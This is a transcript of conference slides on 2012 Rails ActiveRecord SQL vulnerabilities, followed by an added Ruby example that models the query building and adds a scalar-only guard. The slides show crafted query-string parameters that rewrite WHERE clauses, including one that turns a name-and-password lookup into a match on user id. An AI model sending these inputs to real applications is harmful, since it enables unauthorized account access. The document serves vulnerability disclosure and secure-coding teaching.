"Recent Rails SQL Issues" - 2012

Justin Collins

April 23, 2015

Transcript

  1. Rails Vulnerabilities Last Week CVE-2012-2660 CVE-2012-2661

  2. CVE-2012-2660 Allows unexpected “IS NULL” in queries Affects Rails 2.x and 3.x
  3. ActiveRecord Query unless params[:name].nil? @user = User.where(:name => params[:name]) end

  4. Query Parameters ?name[] {"name"=>[nil]}

  5. ActiveRecord Query unless [nil].nil? @user = User.where(:name => [nil]) end

  6. Resulting SQL SELECT "users".* FROM "users" WHERE "users"."name" IS NULL

  7. CVE-2012-2661 Allows some manipulation of WHERE clause via “dotted” query keys Affects Rails 3.x
  8. ActiveRecord Query User.where(:name => params[:name])

  9. ActiveRecord Query User.where("users.name" => params[:name])

  10. Query Parameters ?name[users.id]=1 {"name"=>{"users.id"=>"1"}}

  11. ActiveRecord Query User.where(:name => {"users.id" => "1"})

  12. Resulting SQL SELECT "users".* FROM "users" WHERE "users"."id" = 1
  13. Unreleased Vulnerability Allows some manipulation of WHERE clause via nested hashes in query values Affects 2.3.x and 3.x
  14. ActiveRecord Query User.where(:name => params[:name], :password => params[:password])

  15. Query Parameters ?name[users][id]=1&password[users][id]=1 {"name"=>{"users"=>{"id"=>"1"}}, "password" =>{"users"=>{"id"=>"1"}}}

  16. ActiveRecord Query User.where(:name => {"users"=>{"id"=>"1"}}, :password => {"users"=>{"id"=>"1"}})

  17. Resulting SQL SELECT "users".* FROM "users" WHERE "users"."id" = 1 AND "users"."id" = 1
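The slides show the parsed parameters and the SQL they become, but not the step in between. The following is an added example, not code from the slides or from Rails: a small stand-in for the part of ActiveRecord 3.x that turns a conditions hash into a WHERE clause, reduced to the three behaviours the slides rely on (nil and [nil] becoming IS NULL, "table.column" keys, and nested hashes being read as table/column pairs), so the parameter shapes from slides 4, 10 and 15 can be pushed through it offline. It closes with a type check that does what the `unless params[:name].nil?` guard on slide 3 was meant to do. The function names (build_where, where_scalar, the quoting helpers) are this example's own, and string values are quoted here where Rails would cast them to the column type, so '1' appears below where the slides show 1.

```ruby
# Added example, not code from the slides or from Rails itself: a minimal
# model of ActiveRecord 3.x predicate building, reproducing only the
# behaviours the slides describe, plus a scalar-only guard.

def quote_ident(name)
  '"' + name.to_s.gsub('"', '""') + '"'
end

# Simplified quoting: numbers as-is, everything else as a single-quoted
# string (Rails would cast to the column type instead).
def quote_value(value)
  return value.to_s if value.is_a?(Numeric)
  "'" + value.to_s.gsub("'", "''") + "'"
end

# "users.name" -> ["users", "name"]; a bare "name" belongs to the default
# table. This dotted-key handling is what CVE-2012-2661 turns against the app.
def split_key(key, table)
  parts = key.to_s.split(".", 2)
  parts.size == 2 ? parts : [table, parts[0]]
end

def where_clauses(table, conditions)
  conditions.flat_map do |key, value|
    if value.is_a?(Hash)
      # Nested hash: the key is read as a table name and the inner keys as its
      # columns, which is the behaviour slides 13-17 describe.
      where_clauses(key.to_s, value)
    else
      tbl, col = split_key(key, table)
      column = "#{quote_ident(tbl)}.#{quote_ident(col)}"
      if value.nil? || (value.is_a?(Array) && !value.empty? && value.all?(&:nil?))
        # nil and [nil] both collapse to IS NULL (CVE-2012-2660)
        ["#{column} IS NULL"]
      elsif value.is_a?(Array)
        ["#{column} IN (#{value.compact.map { |v| quote_value(v) }.join(', ')})"]
      else
        ["#{column} = #{quote_value(value)}"]
      end
    end
  end
end

def build_where(table, conditions)
  where_clauses(table, conditions).join(" AND ")
end

# The guard on slide 3, `unless params[:name].nil?`, passes for [nil] and for a
# Hash. Accepting only scalar values, and failing loudly rather than falling
# back to nil (which would itself become IS NULL), keeps those shapes out of
# the query entirely.
def where_scalar(table, conditions)
  conditions.each do |key, value|
    next if value.is_a?(String) || value.is_a?(Numeric)
    raise TypeError, "#{key}: expected a scalar value, got #{value.class}"
  end
  build_where(table, conditions)
end

if __FILE__ == $PROGRAM_NAME
  # Parsed query parameters as shown on the slides.
  puts build_where("users", "name" => [nil])                      # ?name[]
  puts build_where("users", "name" => { "users.id" => "1" })      # ?name[users.id]=1
  puts build_where("users", "name" => { "users" => { "id" => "1" } },
                            "password" => { "users" => { "id" => "1" } })
  begin
    where_scalar("users", "name" => [nil])
  rescue TypeError => e
    puts "rejected: #{e.message}"
  end
  puts where_scalar("users", "name" => "alice")
end
```

Run as a script, the first three lines of output are the WHERE fragments from slides 6, 12 and 17; the fourth shows the array form being refused before any SQL is built. The design point is that the check is on the value's type, not on its truthiness: `nil?` and `blank?` style guards describe the value the developer expects, not the shapes a query-string parser can produce.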